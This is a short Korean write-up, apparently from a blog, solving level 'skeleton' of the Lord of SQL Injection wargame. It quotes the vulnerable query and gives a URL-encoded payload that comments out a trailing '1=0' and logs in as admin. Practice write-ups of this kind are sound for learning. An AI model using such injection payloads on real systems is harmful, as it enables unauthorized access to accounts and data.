Web/Lord of Sql Ingection
LOS skeleton
언우s
2018. 4. 11. 09:48
10. skeleton
$query = "select id from prob_skeleton where id='guest' and pw='{$_GET[pw]}' and 1=0";
1=0 때문에 무조건 false
if($result['id'] == 'admin') solve("skeleton");
id=admin이어야 함
1=0을 #으로 주석 처리
?pw=%27%20or%20id=%27admin%27%23